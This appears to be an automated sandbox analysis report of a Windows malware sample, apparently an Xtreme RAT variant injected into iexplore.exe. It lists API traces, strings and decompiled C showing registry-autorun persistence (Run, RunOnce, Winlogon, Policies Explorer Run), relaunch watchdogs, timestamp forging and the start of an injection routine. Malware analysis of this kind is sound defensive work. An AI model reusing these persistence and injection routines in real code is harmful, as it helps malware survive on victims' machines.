0x00c892c5
0x00c892c9
0x00c892d3
0x00c892eb
0x00c892f5
0x00000000
0x00000000
0x00c89309
0x00c8931c
0x00c89321
0x00c89328
0x00c89329
0x00c8932e
0x00c89331
0x00c8933f
0x00c8934b
0x00c89357
0x00c89363
0x00c8936f
0x00c89375
0x00c89389
0x00c8938a
0x00c89391
0x00c89394
0x00c893a5
0x00c893a6
0x00c893ab
0x00c893ae
0x00c893bc
0x00c893c8
0x00c893d4
0x00c893e0
0x00c893ec
0x00c893f2
0x00c89406
0x00c89407
0x00c8940e
0x00c89411
0x00c89428
0x00c89435
0x00000000
0x00c89435
0x00c892d5
0x00c892e6
0x00000000
0x00c892e6
0x00c892cf
0x00000000
0x00000000
0x00000000
0x00c892d1
0x00c892aa
0x00c8900a
0x00c8903d
0x00c8903d
0x00c8904c
0x00c8907f
0x00c8907f
0x00c8908e
0x00c8909e
0x00c890ca
0x00c890ca
0x00c890d9
0x00c890e9
0x00c8911c
0x00c89152
0x00c89152
0x00c89161
0x00c89190
0x00c891c2
0x00c891c2
0x00c891d1
0x00c891f6
0x00c8921e
0x00c8921e
0x00c8922d
0x00c89260
0x00c89296
0x00c89296
0x00c8922d
0x00000000
0x00c890d9

APIs

LoadLibraryA.KERNEL32(user32.dll), ref: 00C88F06
LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C88F10
LoadLibraryA.KERNEL32(shell32.dll), ref: 00C88F1A
LoadLibraryA.KERNEL32(shlwapi.dll), ref: 00C88F24
LoadLibraryA.KERNEL32(kernel32.dll), ref: 00C88F2E

Part of subcall function 00C8263C: CreateMutexW.KERNEL32(?,?,?,?,00C89C68,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C82652

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C88F62
GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,?,kernel32.dll,shlwapi.dll,shell32.dll,advapi32.dll), ref: 00C88F71
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,?), ref: 00C88F8B
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00001000,00000004,00000000,00000000,?,80000000,00000001,00000000,00000003,00000000), ref: 00C88F9A
ReadFile.KERNEL32(00000000,?,?,?,00000000), ref: 00C88FAB
CloseHandle.KERNEL32(00000000), ref: 00C88FB1
Sleep.KERNEL32(00002710,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,?,kernel32.dll,shlwapi.dll,shell32.dll,advapi32.dll), ref: 00C88FC0

Part of subcall function 00C833A8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

SHDeleteKeyW.SHLWAPI(80000001,?), ref: 00C8909E

Part of subcall function 00C888D0: RegCreateKeyW.ADVAPI32(80000001,SOFTWARE\FakeMessage,?), ref: 00C888E0
Part of subcall function 00C888D0: RegSetValueExW.ADVAPI32(?,FakeMessage,00000000,?,?,?,80000001,SOFTWARE\FakeMessage,?,00000000,?,FakeMessage,?,00C8992C,00000002,00000004), ref: 00C888F8
Part of subcall function 00C888D0: RegCloseKey.ADVAPI32(?,?,FakeMessage,00000000,?,?,?,80000001,SOFTWARE\FakeMessage,?,00000000,?,FakeMessage,?,00C8992C,00000002), ref: 00C88907

Part of subcall function 00C835B0: FindFirstFileW.KERNEL32(00000000), ref: 00C835B9
Part of subcall function 00C835B0: CloseHandle.KERNEL32(00000000), ref: 00C835CA

Part of subcall function 00C834C4: lstrlenW.KERNEL32(00000000), ref: 00C834EB
Part of subcall function 00C834C4: CreateDirectoryW.KERNEL32(?,00000000,00000000), ref: 00C83583

SetFileAttributesW.KERNEL32(?,00000080), ref: 00C89309
SetFileAttributesW.KERNEL32(?,00000080,?,00000080), ref: 00C8931C

Part of subcall function 00C81248: GetSystemTime.KERNEL32(?), ref: 00C81252

Part of subcall function 00C83BC4: SystemTimeToFileTime.KERNEL32(?,?,00000000,00C83C74,?,00000000), ref: 00C83C0F
Part of subcall function 00C83BC4: LocalFileTimeToFileTime.KERNEL32(?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C20
Part of subcall function 00C83BC4: SetFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C51

Part of subcall function 00C83674: GetFileAttributesW.KERNEL32(00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C83678
Part of subcall function 00C83674: SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000), ref: 00C83688

Part of subcall function 00C83218: CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00C83233
Part of subcall function 00C83218: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00C8E07C,?,00000000,?,?,00C89E6B,0000181C,00000000,00000000,00000000,00000080,00000000), ref: 00C83252
Part of subcall function 00C83218: WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00C83263
Part of subcall function 00C83218: CloseHandle.KERNEL32(00000000), ref: 00C8326F

GetLastError.KERNEL32(00000000,00000000,?), ref: 00C8944E
CloseHandle.KERNEL32(00000000), ref: 00C8945B
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00C89476
CloseHandle.KERNEL32(00000000), ref: 00C8947E
GetLastError.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?), ref: 00C89497
ExitProcess.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00C894A5
CloseHandle.KERNEL32(00000000), ref: 00C894AD
Sleep.KERNEL32(00001388,00000000,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00C894B7

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00C89033, 00C89075
Software\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 00C89186, 00C891B8
kernel32.dll, xrefs: 00C88F29
shell32.dll, xrefs: 00C88F15
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, xrefs: 00C891EC, 00C89214
shlwapi.dll, xrefs: 00C88F1F
StubPath, xrefs: 00C890B7
restart, xrefs: 00C88FC5
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00C89112, 00C89148
user32.dll, xrefs: 00C88F01
.functions, xrefs: 00C88ED4
Load, xrefs: 00C89181, 00C891B3
Shell, xrefs: 00C891E7, 00C8920F
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run, xrefs: 00C89256, 00C8928C
open, xrefs: 00C8946F
explorer.exe , xrefs: 00C88FE3
advapi32.dll, xrefs: 00C88F0B

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C8939E, Relevance: 31.9, APIs: 9, Strings: 9, Instructions: 356
sleepCrypto

C-Code - Quality: 58%

			E00C8939E() {
				void* _t121;
				void* _t143;
				void* _t257;
				void* _t258;
				void* _t259;
				void* _t262;
				intOrPtr _t278;
				intOrPtr _t281;
				void* _t305;
				intOrPtr _t306;

				E00C814F0();
				while(1) {
					_push(_t305);
					_push(0xc89416);
					_push( *[fs:eax]);
					 *[fs:eax] = _t306;
					_push(E00C812A4(0x1b) + 1);
					_push(E00C812A4(0xa) + 1);
					_push(E00C812A4(0xa) + 1);
					_push(E00C812A4(0xa) + 1);
					_push(E00C812A4(0xb) + 1);
					_t143 = E00C812A4(6);
					_pop(_t262);
					E00C83BC4( *((intOrPtr*)(_t305 + 8)) + 0x181c, _t257, _t262, _t143 + 0x7d1);
					_pop(_t281);
					 *[fs:eax] = _t281;
					E00C83674( *((intOrPtr*)(_t305 + 8)) + 0x1a26);
					E00C83674( *((intOrPtr*)(_t305 + 8)) + 0x181c);
					goto L28;
					do {
						do {
							L28:
							_t258 = E00C8263C(0, 0,  *((intOrPtr*)(_t305 + 8)) + 0x1310);
							if(GetLastError() == 0xb7) {
								CloseHandle(_t258);
							} else {
								CloseHandle(_t258);
								ShellExecuteW(0, L"open",  *((intOrPtr*)(_t305 + 8)) + 0x181c, 0, 0, 0);
							}
							_t257 = E00C8263C(0, 0,  *((intOrPtr*)(_t305 + 8)) + 0x1326);
							if(GetLastError() != 0xb7) {
								CloseHandle(_t257);
							} else {
								ExitProcess(0);
							}
							Sleep(0x1388);
							if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x1258)) == 1) {
								if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12d8)) == 1) {
									E00C888D0(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t252, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
								}
								if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12d9)) == 1) {
									E00C888D0(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t243, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
								}
								if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12da)) == 1) {
									SHDeleteKeyW(0x80000001,  *((intOrPtr*)(_t305 + 8)) + 0x1e3a);
									E00C888D0(0x80000002,  *((intOrPtr*)(_t305 + 8)) + 0x1e3a, 2, E00C82E48( *((intOrPtr*)(_t305 - 0x14))) + _t234, 0,  *((intOrPtr*)(_t305 - 0x14)));
								}
								if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12f2)) == 1) {
									if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12f3)) == 1) {
										E00C888D0(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t215, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
										E00C888D0(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t224, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
									}
									if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12f4)) == 1) {
										E00C888D0(0x80000001, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t199, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
										E00C888D0(0x80000002, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t207, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
									}
									if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12f5)) == 1) {
										E00C888D0(0x80000001, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", 2, E00C82E48( *((intOrPtr*)(_t305 - 0x18))) + _t185, 0,  *((intOrPtr*)(_t305 - 0x18)));
										E00C888D0(0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", 2, E00C82E48( *((intOrPtr*)(_t305 - 0x18))) + _t191, 0,  *((intOrPtr*)(_t305 - 0x18)));
									}
									if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12f6)) == 1) {
										E00C888D0(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t169, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
										E00C888D0(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t178, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
									}
								}
							}
						} while (E00C835B0( *((intOrPtr*)(_t305 + 8)) + 0x181c) != 0 || E00C834C4( *((intOrPtr*)(_t305 + 8)) + 0x1a26) == 0);
						if( *((intOrPtr*)(_t305 - 0xc)) != 0) {
							if(__eflags <= 0) {
								goto L24;
							}
							L23:
							E00C83218( *((intOrPtr*)(_t305 + 8)) + 0x181c,  *((intOrPtr*)(_t305 - 4)),  *((intOrPtr*)(_t305 - 0x10)),  *((intOrPtr*)(_t305 - 0xc)));
							goto L24;
						}
						if( *((intOrPtr*)(_t305 - 0x10)) <= 0) {
							goto L24;
						}
						goto L23;
						L24:
					} while ( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x1235)) != 1);
					SetFileAttributesW( *((intOrPtr*)(_t305 + 8)) + 0x1a26, 0x80);
					SetFileAttributesW( *((intOrPtr*)(_t305 + 8)) + 0x181c, 0x80);
					E00C81248();
					_push(_t305);
					_push(0xc89399);
					_push( *[fs:eax]);
					 *[fs:eax] = _t306;
					_push(E00C812A4(0x1b) + 1);
					_push(E00C812A4(0xa) + 1);
					_push(E00C812A4(0xa) + 1);
					_push(E00C812A4(0xa) + 1);
					_push(E00C812A4(0xb) + 1);
					_t121 = E00C812A4(6);
					_pop(_t259);
					E00C83BC4( *((intOrPtr*)(_t305 + 8)) + 0x1a26, _t257, _t259, _t121 + 0x7d1);
					_pop(_t278);
					 *[fs:eax] = _t278;
				}
			}

APIs

Part of subcall function 00C83BC4: SystemTimeToFileTime.KERNEL32(?,?,00000000,00C83C74,?,00000000), ref: 00C83C0F
Part of subcall function 00C83BC4: LocalFileTimeToFileTime.KERNEL32(?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C20
Part of subcall function 00C83BC4: SetFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C51

Part of subcall function 00C83674: GetFileAttributesW.KERNEL32(00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C83678
Part of subcall function 00C83674: SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000), ref: 00C83688

Part of subcall function 00C8263C: CreateMutexW.KERNEL32(?,?,?,?,00C89C68,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C82652

SHDeleteKeyW.SHLWAPI(80000001,?), ref: 00C8909E

Part of subcall function 00C888D0: RegCreateKeyW.ADVAPI32(80000001,SOFTWARE\FakeMessage,?), ref: 00C888E0
Part of subcall function 00C888D0: RegSetValueExW.ADVAPI32(?,FakeMessage,00000000,?,?,?,80000001,SOFTWARE\FakeMessage,?,00000000,?,FakeMessage,?,00C8992C,00000002,00000004), ref: 00C888F8
Part of subcall function 00C888D0: RegCloseKey.ADVAPI32(?,?,FakeMessage,00000000,?,?,?,80000001,SOFTWARE\FakeMessage,?,00000000,?,FakeMessage,?,00C8992C,00000002), ref: 00C88907

Part of subcall function 00C835B0: FindFirstFileW.KERNEL32(00000000), ref: 00C835B9
Part of subcall function 00C835B0: CloseHandle.KERNEL32(00000000), ref: 00C835CA

ExitProcess.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00C894A5

Part of subcall function 00C834C4: lstrlenW.KERNEL32(00000000), ref: 00C834EB
Part of subcall function 00C834C4: CreateDirectoryW.KERNEL32(?,00000000,00000000), ref: 00C83583

SetFileAttributesW.KERNEL32(?,00000080), ref: 00C89309
SetFileAttributesW.KERNEL32(?,00000080,?,00000080), ref: 00C8931C

Part of subcall function 00C81248: GetSystemTime.KERNEL32(?), ref: 00C81252

Part of subcall function 00C83218: CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00C83233
Part of subcall function 00C83218: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00C8E07C,?,00000000,?,?,00C89E6B,0000181C,00000000,00000000,00000000,00000080,00000000), ref: 00C83252
Part of subcall function 00C83218: WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00C83263
Part of subcall function 00C83218: CloseHandle.KERNEL32(00000000), ref: 00C8326F

GetLastError.KERNEL32(00000000,00000000,?), ref: 00C8944E
CloseHandle.KERNEL32(00000000), ref: 00C8945B
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00C89476
CloseHandle.KERNEL32(00000000), ref: 00C8947E
GetLastError.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?), ref: 00C89497
CloseHandle.KERNEL32(00000000), ref: 00C894AD
Sleep.KERNEL32(00001388,00000000,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00C894B7

Strings

Software\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 00C89186, 00C891B8
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00C89033, 00C89075
Load, xrefs: 00C89181, 00C891B3
Shell, xrefs: 00C891E7, 00C8920F
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run, xrefs: 00C89256, 00C8928C
open, xrefs: 00C8946F
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, xrefs: 00C891EC, 00C89214
StubPath, xrefs: 00C890B7
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00C89112, 00C89148

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C8941B, Relevance: 31.9, APIs: 9, Strings: 9, Instructions: 356
sleepCrypto

C-Code - Quality: 58%

			E00C8941B() {
				void* _t121;
				void* _t143;
				void* _t257;
				void* _t258;
				void* _t259;
				void* _t262;
				intOrPtr _t278;
				intOrPtr _t281;
				void* _t305;
				intOrPtr _t306;

				E00C814F0();
				while(1) {
					E00C83674( *((intOrPtr*)(_t305 + 8)) + 0x1a26);
					E00C83674( *((intOrPtr*)(_t305 + 8)) + 0x181c);
					goto L28;
					do {
						do {
							L28:
							_t258 = E00C8263C(0, 0,  *((intOrPtr*)(_t305 + 8)) + 0x1310);
							if(GetLastError() == 0xb7) {
								CloseHandle(_t258);
							} else {
								CloseHandle(_t258);
								ShellExecuteW(0, L"open",  *((intOrPtr*)(_t305 + 8)) + 0x181c, 0, 0, 0);
							}
							_t257 = E00C8263C(0, 0,  *((intOrPtr*)(_t305 + 8)) + 0x1326);
							if(GetLastError() != 0xb7) {
								CloseHandle(_t257);
							} else {
								ExitProcess(0);
							}
							Sleep(0x1388);
							if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x1258)) == 1) {
								if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12d8)) == 1) {
									E00C888D0(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t252, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
								}
								if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12d9)) == 1) {
									E00C888D0(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t243, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
								}
								if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12da)) == 1) {
									SHDeleteKeyW(0x80000001,  *((intOrPtr*)(_t305 + 8)) + 0x1e3a);
									E00C888D0(0x80000002,  *((intOrPtr*)(_t305 + 8)) + 0x1e3a, 2, E00C82E48( *((intOrPtr*)(_t305 - 0x14))) + _t234, 0,  *((intOrPtr*)(_t305 - 0x14)));
								}
								if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12f2)) == 1) {
									if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12f3)) == 1) {
										E00C888D0(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t215, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
										E00C888D0(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t224, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
									}
									if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12f4)) == 1) {
										E00C888D0(0x80000001, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t199, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
										E00C888D0(0x80000002, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t207, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
									}
									if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12f5)) == 1) {
										E00C888D0(0x80000001, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", 2, E00C82E48( *((intOrPtr*)(_t305 - 0x18))) + _t185, 0,  *((intOrPtr*)(_t305 - 0x18)));
										E00C888D0(0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", 2, E00C82E48( *((intOrPtr*)(_t305 - 0x18))) + _t191, 0,  *((intOrPtr*)(_t305 - 0x18)));
									}
									if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12f6)) == 1) {
										E00C888D0(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t169, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
										E00C888D0(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t178, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
									}
								}
							}
						} while (E00C835B0( *((intOrPtr*)(_t305 + 8)) + 0x181c) != 0 || E00C834C4( *((intOrPtr*)(_t305 + 8)) + 0x1a26) == 0);
						if( *((intOrPtr*)(_t305 - 0xc)) != 0) {
							if(__eflags <= 0) {
								goto L24;
							}
							L23:
							E00C83218( *((intOrPtr*)(_t305 + 8)) + 0x181c,  *((intOrPtr*)(_t305 - 4)),  *((intOrPtr*)(_t305 - 0x10)),  *((intOrPtr*)(_t305 - 0xc)));
							goto L24;
						}
						if( *((intOrPtr*)(_t305 - 0x10)) <= 0) {
							goto L24;
						}
						goto L23;
						L24:
					} while ( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x1235)) != 1);
					SetFileAttributesW( *((intOrPtr*)(_t305 + 8)) + 0x1a26, 0x80);
					SetFileAttributesW( *((intOrPtr*)(_t305 + 8)) + 0x181c, 0x80);
					E00C81248();
					_push(_t305);
					_push(0xc89399);
					_push( *[fs:eax]);
					 *[fs:eax] = _t306;
					_push(E00C812A4(0x1b) + 1);
					_push(E00C812A4(0xa) + 1);
					_push(E00C812A4(0xa) + 1);
					_push(E00C812A4(0xa) + 1);
					_push(E00C812A4(0xb) + 1);
					_t121 = E00C812A4(6);
					_pop(_t259);
					E00C83BC4( *((intOrPtr*)(_t305 + 8)) + 0x1a26, _t257, _t259, _t121 + 0x7d1);
					_pop(_t278);
					 *[fs:eax] = _t278;
					_push(_t305);
					_push(0xc89416);
					_push( *[fs:eax]);
					 *[fs:eax] = _t306;
					_push(E00C812A4(0x1b) + 1);
					_push(E00C812A4(0xa) + 1);
					_push(E00C812A4(0xa) + 1);
					_push(E00C812A4(0xa) + 1);
					_push(E00C812A4(0xb) + 1);
					_t143 = E00C812A4(6);
					_pop(_t262);
					E00C83BC4( *((intOrPtr*)(_t305 + 8)) + 0x181c, _t257, _t262, _t143 + 0x7d1);
					_pop(_t281);
					 *[fs:eax] = _t281;
				}
			}

APIs

Part of subcall function 00C83674: GetFileAttributesW.KERNEL32(00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C83678
Part of subcall function 00C83674: SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000), ref: 00C83688

Part of subcall function 00C8263C: CreateMutexW.KERNEL32(?,?,?,?,00C89C68,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C82652

SHDeleteKeyW.SHLWAPI(80000001,?), ref: 00C8909E

Part of subcall function 00C888D0: RegCreateKeyW.ADVAPI32(80000001,SOFTWARE\FakeMessage,?), ref: 00C888E0
Part of subcall function 00C888D0: RegSetValueExW.ADVAPI32(?,FakeMessage,00000000,?,?,?,80000001,SOFTWARE\FakeMessage,?,00000000,?,FakeMessage,?,00C8992C,00000002,00000004), ref: 00C888F8
Part of subcall function 00C888D0: RegCloseKey.ADVAPI32(?,?,FakeMessage,00000000,?,?,?,80000001,SOFTWARE\FakeMessage,?,00000000,?,FakeMessage,?,00C8992C,00000002), ref: 00C88907

Part of subcall function 00C835B0: FindFirstFileW.KERNEL32(00000000), ref: 00C835B9
Part of subcall function 00C835B0: CloseHandle.KERNEL32(00000000), ref: 00C835CA

ExitProcess.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00C894A5

Part of subcall function 00C834C4: lstrlenW.KERNEL32(00000000), ref: 00C834EB
Part of subcall function 00C834C4: CreateDirectoryW.KERNEL32(?,00000000,00000000), ref: 00C83583

SetFileAttributesW.KERNEL32(?,00000080), ref: 00C89309
SetFileAttributesW.KERNEL32(?,00000080,?,00000080), ref: 00C8931C

Part of subcall function 00C81248: GetSystemTime.KERNEL32(?), ref: 00C81252

Part of subcall function 00C83BC4: SystemTimeToFileTime.KERNEL32(?,?,00000000,00C83C74,?,00000000), ref: 00C83C0F
Part of subcall function 00C83BC4: LocalFileTimeToFileTime.KERNEL32(?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C20
Part of subcall function 00C83BC4: SetFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C51

Part of subcall function 00C83218: CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00C83233
Part of subcall function 00C83218: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00C8E07C,?,00000000,?,?,00C89E6B,0000181C,00000000,00000000,00000000,00000080,00000000), ref: 00C83252
Part of subcall function 00C83218: WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00C83263
Part of subcall function 00C83218: CloseHandle.KERNEL32(00000000), ref: 00C8326F

GetLastError.KERNEL32(00000000,00000000,?), ref: 00C8944E
CloseHandle.KERNEL32(00000000), ref: 00C8945B
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00C89476
CloseHandle.KERNEL32(00000000), ref: 00C8947E
GetLastError.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?), ref: 00C89497
CloseHandle.KERNEL32(00000000), ref: 00C894AD
Sleep.KERNEL32(00001388,00000000,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00C894B7

Strings

Software\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 00C89186, 00C891B8
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00C89033, 00C89075
Load, xrefs: 00C89181, 00C891B3
Shell, xrefs: 00C891E7, 00C8920F
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run, xrefs: 00C89256, 00C8928C
open, xrefs: 00C8946F
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, xrefs: 00C891EC, 00C89214
StubPath, xrefs: 00C890B7
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00C89112, 00C89148

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C84600, Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 223
injectionthreadprocess

C-Code - Quality: 68%

			E00C84600(long __eax, void** __ecx, WCHAR* __edx, void* __eflags, intOrPtr _a4) {
				WCHAR* _v8;
				char _v9;
				void _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v92;
				long _v256;
				long _v260;
				void* _v288;
				intOrPtr _v300;
				signed short _v334;
				void* _v340;
				intOrPtr _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				long _v372;
				void* _v380;
				struct _PROCESS_INFORMATION _v396;
				struct _CONTEXT _v668;
				int _t80;
				void* _t81;
				int _t113;
				int _t119;
				long _t149;
				intOrPtr _t167;
				intOrPtr _t168;
				intOrPtr _t171;
				signed int _t172;
				void** _t173;
				void* _t175;
				void* _t176;
				intOrPtr* _t178;
				intOrPtr* _t179;
				intOrPtr* _t180;

				_t173 = __ecx;
				_v8 = __edx;
